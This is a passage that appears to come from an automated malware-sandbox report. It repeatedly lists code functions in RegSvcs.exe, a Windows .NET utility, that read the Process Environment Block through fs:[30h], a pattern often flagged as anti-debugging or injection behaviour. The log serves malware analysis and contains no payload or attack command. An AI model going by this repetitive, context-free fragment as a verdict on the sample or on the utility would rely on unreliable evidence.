Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132140 mov ecx, dword ptr fs:[00000030h]	7_2_01132140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132140 mov eax, dword ptr fs:[00000030h]	7_2_01132140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01172160 mov eax, dword ptr fs:[00000030h]	7_2_01172160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B019F mov eax, dword ptr fs:[00000030h]	7_2_011B019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B019F mov eax, dword ptr fs:[00000030h]	7_2_011B019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B019F mov eax, dword ptr fs:[00000030h]	7_2_011B019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B019F mov eax, dword ptr fs:[00000030h]	7_2_011B019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A197 mov eax, dword ptr fs:[00000030h]	7_2_0112A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A197 mov eax, dword ptr fs:[00000030h]	7_2_0112A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A197 mov eax, dword ptr fs:[00000030h]	7_2_0112A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01170185 mov eax, dword ptr fs:[00000030h]	7_2_01170185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0118E1D8 mov eax, dword ptr fs:[00000030h]	7_2_0118E1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A01DA mov eax, dword ptr fs:[00000030h]	7_2_011A01DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A01DA mov eax, dword ptr fs:[00000030h]	7_2_011A01DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011461D1 mov eax, dword ptr fs:[00000030h]	7_2_011461D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011461D1 mov eax, dword ptr fs:[00000030h]	7_2_011461D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE1D0 mov ecx, dword ptr fs:[00000030h]	7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011AE1D0 mov eax, dword ptr fs:[00000030h]	7_2_011AE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011601F8 mov eax, dword ptr fs:[00000030h]	7_2_011601F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E016 mov eax, dword ptr fs:[00000030h]	7_2_0114E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E016 mov eax, dword ptr fs:[00000030h]	7_2_0114E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E016 mov eax, dword ptr fs:[00000030h]	7_2_0114E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E016 mov eax, dword ptr fs:[00000030h]	7_2_0114E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B4000 mov ecx, dword ptr fs:[00000030h]	7_2_011B4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112C020 mov eax, dword ptr fs:[00000030h]	7_2_0112C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A020 mov eax, dword ptr fs:[00000030h]	7_2_0112A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132050 mov eax, dword ptr fs:[00000030h]	7_2_01132050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6050 mov eax, dword ptr fs:[00000030h]	7_2_011B6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01192045 mov eax, dword ptr fs:[00000030h]	7_2_01192045
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115C073 mov eax, dword ptr fs:[00000030h]	7_2_0115C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A060 mov eax, dword ptr fs:[00000030h]	7_2_0116A060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113208A mov eax, dword ptr fs:[00000030h]	7_2_0113208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011280A0 mov eax, dword ptr fs:[00000030h]	7_2_011280A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B20DE mov eax, dword ptr fs:[00000030h]	7_2_011B20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112C0F0 mov eax, dword ptr fs:[00000030h]	7_2_0112C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011720F0 mov ecx, dword ptr fs:[00000030h]	7_2_011720F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A0E3 mov ecx, dword ptr fs:[00000030h]	7_2_0112A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011380E9 mov eax, dword ptr fs:[00000030h]	7_2_011380E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B60E0 mov eax, dword ptr fs:[00000030h]	7_2_011B60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01150310 mov ecx, dword ptr fs:[00000030h]	7_2_01150310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112C301 mov ecx, dword ptr fs:[00000030h]	7_2_0112C301
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A30B mov eax, dword ptr fs:[00000030h]	7_2_0116A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A30B mov eax, dword ptr fs:[00000030h]	7_2_0116A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A30B mov eax, dword ptr fs:[00000030h]	7_2_0116A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132324 mov eax, dword ptr fs:[00000030h]	7_2_01132324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A035C mov eax, dword ptr fs:[00000030h]	7_2_011A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A035C mov eax, dword ptr fs:[00000030h]	7_2_011A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A035C mov eax, dword ptr fs:[00000030h]	7_2_011A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011A035C mov eax, dword ptr fs:[00000030h]	7_2_011A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov ecx, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h]	7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h]	7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0119634C mov eax, dword ptr fs:[00000030h]	7_2_0119634C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128397 mov eax, dword ptr fs:[00000030h]	7_2_01128397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128397 mov eax, dword ptr fs:[00000030h]	7_2_01128397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01128397 mov eax, dword ptr fs:[00000030h]	7_2_01128397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E388 mov eax, dword ptr fs:[00000030h]	7_2_0112E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E388 mov eax, dword ptr fs:[00000030h]	7_2_0112E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E388 mov eax, dword ptr fs:[00000030h]	7_2_0112E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115438F mov eax, dword ptr fs:[00000030h]	7_2_0115438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115438F mov eax, dword ptr fs:[00000030h]	7_2_0115438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h]	7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h]	7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h]	7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h]	7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B63C0 mov eax, dword ptr fs:[00000030h]	7_2_011B63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0114E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011663FF mov eax, dword ptr fs:[00000030h]	7_2_011663FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h]	7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140218 mov eax, dword ptr fs:[00000030h]	7_2_01140218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112823B mov eax, dword ptr fs:[00000030h]	7_2_0112823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A250 mov eax, dword ptr fs:[00000030h]	7_2_0112A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01136259 mov eax, dword ptr fs:[00000030h]	7_2_01136259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B8243 mov eax, dword ptr fs:[00000030h]	7_2_011B8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B8243 mov ecx, dword ptr fs:[00000030h]	7_2_011B8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134260 mov eax, dword ptr fs:[00000030h]	7_2_01134260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134260 mov eax, dword ptr fs:[00000030h]	7_2_01134260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01134260 mov eax, dword ptr fs:[00000030h]	7_2_01134260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112826B mov eax, dword ptr fs:[00000030h]	7_2_0112826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E284 mov eax, dword ptr fs:[00000030h]	7_2_0116E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E284 mov eax, dword ptr fs:[00000030h]	7_2_0116E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B0283 mov eax, dword ptr fs:[00000030h]	7_2_011B0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B0283 mov eax, dword ptr fs:[00000030h]	7_2_011B0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B0283 mov eax, dword ptr fs:[00000030h]	7_2_011B0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011402A0 mov eax, dword ptr fs:[00000030h]	7_2_011402A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011402A0 mov eax, dword ptr fs:[00000030h]	7_2_011402A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011402E1 mov eax, dword ptr fs:[00000030h]	7_2_011402E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011402E1 mov eax, dword ptr fs:[00000030h]	7_2_011402E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011402E1 mov eax, dword ptr fs:[00000030h]	7_2_011402E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h]	7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h]	7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h]	7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h]	7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h]	7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h]	7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116656A mov eax, dword ptr fs:[00000030h]	7_2_0116656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116656A mov eax, dword ptr fs:[00000030h]	7_2_0116656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116656A mov eax, dword ptr fs:[00000030h]	7_2_0116656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E59C mov eax, dword ptr fs:[00000030h]	7_2_0116E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132582 mov eax, dword ptr fs:[00000030h]	7_2_01132582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01132582 mov ecx, dword ptr fs:[00000030h]	7_2_01132582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A580 mov ecx, dword ptr fs:[00000030h]	7_2_0112A580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112A580 mov eax, dword ptr fs:[00000030h]	7_2_0112A580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01164588 mov eax, dword ptr fs:[00000030h]	7_2_01164588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011545B1 mov eax, dword ptr fs:[00000030h]	7_2_011545B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011545B1 mov eax, dword ptr fs:[00000030h]	7_2_011545B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011365D0 mov eax, dword ptr fs:[00000030h]	7_2_011365D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0116A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0116A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E5CF mov eax, dword ptr fs:[00000030h]	7_2_0116E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116E5CF mov eax, dword ptr fs:[00000030h]	7_2_0116E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011325E0 mov eax, dword ptr fs:[00000030h]	7_2_011325E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C5ED mov eax, dword ptr fs:[00000030h]	7_2_0116C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116C5ED mov eax, dword ptr fs:[00000030h]	7_2_0116C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168402 mov eax, dword ptr fs:[00000030h]	7_2_01168402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168402 mov eax, dword ptr fs:[00000030h]	7_2_01168402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_01168402 mov eax, dword ptr fs:[00000030h]	7_2_01168402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0116A430 mov eax, dword ptr fs:[00000030h]	7_2_0116A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E420 mov eax, dword ptr fs:[00000030h]	7_2_0112E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E420 mov eax, dword ptr fs:[00000030h]	7_2_0112E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112E420 mov eax, dword ptr fs:[00000030h]	7_2_0112E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_0112C427 mov eax, dword ptr fs:[00000030h]	7_2_0112C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h]	7_2_011B6420
